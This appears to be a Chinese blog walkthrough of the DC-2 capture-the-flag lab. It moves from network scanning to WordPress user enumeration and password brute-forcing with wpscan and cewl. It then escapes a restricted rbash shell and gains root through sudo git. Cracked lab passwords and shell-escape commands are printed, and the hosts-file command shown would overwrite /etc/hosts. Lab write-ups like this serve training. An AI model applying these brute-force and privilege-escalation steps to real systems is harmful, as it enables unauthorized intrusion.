首页 > 其他分享 >DC-2

DC-2

时间:2024-01-18 17:13:42浏览次数:41  
标签:bin jerry DC flag3 tom txt

靶场信息:

靶场下载地址:http://www.five86.com/downloads/DC-2.zip

网络信息:

kali:192.168.0.25
靶机:192.168.0.

信息收集

扫描存活主机:

arp-scan -l

image.png
发现192.168.0.131存活

使用nmap进行更详细的扫描:

nmap -A 192.168.0.131 -O

image.png
可以看到该主机开放了http80服务和
中间件:Apache/2.4.10

flag1:ip地址重定向

访问一下http服务
image.png
访问http://192.168.0.131时,网站跳转到了dc-2

该技术是ip地址重定向,通过绑定主机名或域名与ip来达到解析的目的,可以屏蔽恶意网站或加快访问。

访问需要修改hosts文件
linux添加hosts文件的方法:
sudo bash -c 'echo [ip] [跳转的地址] >> /ect/hosts'

在kali输入命令:

sudo bash -c 'echo 192.168.0.131 dc-2 > /etc/hosts'

# 或者修改/etc/hosts文件也是可以的
vim /etc/hosts
192.168.0.131 dc-2

image.png
增加重定向地址,即可正常访问web服务:
image.png
image.png

有一个flag,访问一下:
image.png
flag1提示:
你通常的单词表可能不起作用,所以,也许你只需要cewl。

cewl 是一个字典在线生成工具

密码越多越好,但有时你就是无法赢得所有的密码。
以一个人的身份登录以查看下一个标志。
如果找不到,请以另一个用户登录。

flag2:爆破用户进后台

使用dirb扫描目录,发现有一个/wp-admin/
image.png

访问,发现是一个登录页面:
image.png

上面提示我们需要用cewl生成密码字典,先使用wpscan进行用户枚举
使用wpscan扫描:

wpscan --url http://dc-2/ -e

image.png
image.png
扫描到了三个账号,分别是:admin、jerry、tom

有了账号还需要密码,新建一个txt文件做用户字典,然后使用cewl生成密码字典:

vim user.txt		# 新建txt作用户字典

admin
jerry
tom

image.png

┌──(root㉿kali)-[~/Documents]
└─# cewl http://dc-2/ -w user_passwd.txt		# 使用cewl生成密码字典
CeWL 6.1 (Max Length) Robin Wood ([email protected]) (https://digi.ninja/)

image.png

最后使用wpscan进行爆破,或者使用burp是可以的:

┌──(root㉿kali)-[~/Documents]
└─# wpscan --url http://dc-2 -U user.txt -P user_passwd.txt

image.png
扫出了两个匹配的账号密码:

jerry/adipiscing
tom/parturient

返回登录页面http://dc-2/up-admin/,使用获取到的账号密码进行登录:
image.png

发现flag2:
image.png
如果你不能利用WordPress并走捷径,还有另一种方法。
希望你找到了另一个入口。

flag3

作者提示无法使用wordpress,也就是80端口,尝试一下从ssh服务,7744端口入手
需要使用tom用户才可以进行登录,jarry用户是无法进行登录的:

┌──(root㉿kali)-[~/Documents]
└─# ssh [email protected] -p 7744  
passwd:parturient

ls发现flag3.txt,权限不够无法查看
image.png

查看权限:
shell权限受限了,无法使用cat命令查看flag3.txt
image.png

尝试使用其他命令进行文件读取:

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

tom@DC-2:~$ more flag3.txt
-rbash: more: command not found

tom@DC-2:~$ /bin/cat flag3.txt
-rbash: /bin/cat: restricted: cannot specify `/' in command names

tom@DC-2:~$ head flag3.txt
-rbash: head: command not found

tom@DC-2:~$ tail flag3.txt
-rbash: tail: command not found

tom@DC-2:~$ less flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
flag3.txt (END)
# 可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力而死。flag3.txt(结束)

使用less命令可以进行读取文件的查看,vi命令也可以

没看懂作者想表达什么,使用su切换jerry用户

tom@DC-2:~$ su jerry
-rbash: su: command not found

rbash"是一个名为"restricted bash"的工具,它是bash shell的一种受限版本

flag4 rbash绕过

查看当前的环境变量:

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin

在/home/tom/usr/bin下,所以shell被限制了,导致不能执行所有的命令,
有两种可绕过的方式:

  • 转义环境变量的方式
vi test.txt
:set shell=/bin/bash
shell
  • 定义一个环境变量,再添加新的环境变量,可以得到一个shell
BASH_CMD[a]=/bin/sh;a
/bin/bash

这里使用环境变量的方法,比较快捷:

ztom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
$ whoami
tom

image.png

rbash绕过之后就可以使用su登录到jerry

$ su jerry
Password: adipiscing
jerry@DC-2:/home/tom$ 

jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
jerry@DC-2:/home/tom$ cd
jerry@DC-2:~$ ls
flag4.txt		# 发现flag4
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

很高兴看到您已经完成了这一步-但您还没有到家。
你仍然需要获得最终的旗帜(唯一真正重要的旗帜!!)这里没有提示——你现在要靠自己了。
:-)走吧-离开这里!!!!

作者说没有提示,但是他暗示我们可以使用git

flag5 git提权

sudo -l

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

提示不需要密码就可以使用git

sudo git help config
!/bin/bash

image.png

使用find命令查找带flag名的文件居然找不到,直接搜了所有.txt的文件,发现了一个flag.txt,打开,发现这是最后一个flag,也就是flag5
image.png
image.png

root@DC-2:/home/jerry# find / -type f -name "*txt*"
root@DC-2:/home/jerry# cat /root/final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

恭喜!!特别感谢所有给我发推特和提供反馈的人——我非常感激。
如果你喜欢这个CTF,请通过@DCAU7给我发一条推文。

标签:bin,jerry,DC,flag3,tom,txt
From: https://www.cnblogs.com/imawuya/p/17972921

相关文章

  • AP8851L 宽电压降压恒压DC-DC 电源管理芯片
    产品描述 AP8851L一款宽电压范围降压型DC-DC电源管理芯片,内部集成使能开关控制、基准电源、误差放大器、过热保护、限流保护、短路保护等功能,非常适合在宽输入电压范围具有优良的负载和线性调整度。AP8851L芯片包含每周期的峰值限流、软启动、过压保护和温度保护,带......
  • BOSHIDA DC电源模块在新能源领域的应用前景
    BOSHIDADC电源模块在新能源领域的应用前景DC电源模块在新能源领域有着广阔的应用前景。随着可再生能源技术的发展和普及,如太阳能和风能等的应用逐渐增多,DC电源模块在这些领域的应用越来越重要。 首先,DC电源模块可以用于太阳能发电系统的直流电力转换。太阳能发电系统产生的......
  • Blazor Auto IDS/OIDC 单点登录授权实例讲解2
    目录:OpenID与OAuth2基础知识BlazorwasmGoogle登录BlazorwasmGitee码云登录BlazorSSR/WASMIDS/OIDC单点登录授权实例讲解1BlazorSSR/WASMIDS/OIDC单点登录授权实例讲解2BlazorSSR/WASMIDS/OIDC单点登录授权实例讲解3源码BlazorOIDC/Shared1.编辑Bl......
  • Blazor SSR/WASM IDS/OIDC 单点登录授权实例讲解1
    目录:OpenID与OAuth2基础知识BlazorwasmGoogle登录BlazorwasmGitee码云登录BlazorSSR/WASMIDS/OIDC单点登录授权实例讲解1BlazorSSR/WASMIDS/OIDC单点登录授权实例讲解2BlazorSSR/WASMIDS/OIDC单点登录授权实例讲解3源码BlazorOIDC/Server1.建立Bl......
  • xdctf2015_pwn200
    xdctf2015_pwn20032位泄露了ibcmain函数中输入vuln函数中存在溢出漏洞非常常规的泄露libc,直接上代码frompwnimport*elf=ELF('./bof')Lib=ELF('/lib/i386-linux-gnu/libc.so.6')io=process('./bof')padding=b'A'*112payload1=padding+......
  • BOSHIDA DC电源模块在物联网设备中的关键作用
    BOSHIDADC电源模块在物联网设备中的关键作用DC电源模块在物联网设备中发挥着关键作用。物联网设备通常需要稳定可靠的电源供应,以保证设备的正常运行。DC电源模块提供了相应的电压和电流输出,为物联网设备提供所需的电力。 具体来说,DC电源模块在物联网设备中的关键作用包括:1.......
  • 我成为开源贡献者的原因竟然是做MySql-CDC数据同步
    今年下半年机缘巧合下公司决定搭建自己的数据中台,中台的建设势必少不了数据集成。首先面临的就是数据集成技术选型的问题,按照社区活跃度、数据源适配性、同步效率等要求对市面上几个成熟度较高的开源引擎进行了深度调研。最终经过内部讨论决定用ApacheSeaTunnel作为数据集成的基......
  • 创建DOM节点时出现错误信息:box.appendChild is not a function
    1、代码正常书写如下<divclass="box"></div><!--JavaScript代码--><script>//创建节点letbox=document.getElementsByClassName("box");letwords=document.createElement("span");......
  • 世微AP6315 dc-dc 单节充电2A同步锂电充电芯片
    概述是一款面向5V交流适配器的2A锂离子电池充电器。它是采用1.5MHz固定频率的同步降压型转换器,因此具有高达90%以上的充电效率,自身发热量极小。包括完整的充电终止电路、自动再充电和一个达?1%的4.2V预设充电电压,内部集成了防反灌保护、输出短路保护、芯片及电池温度保护等多种功能......
  • 世微AP6315 dc-dc 单节充电2A 锂电IC 同步锂电充电芯片
    概述是一款面向5V交流适配器的2A锂离子电池充电器。它是采用1.5MHz固定频率的同步降压型转换器,因此具有高达90%以上的充电效率,自身发热量极小。包括完整的充电终止电路、自动再充电和一个达?1%的4.2V预设充电电压,内部集成了防反灌保护、输出短路保护、芯片及电池温度保护等多种功......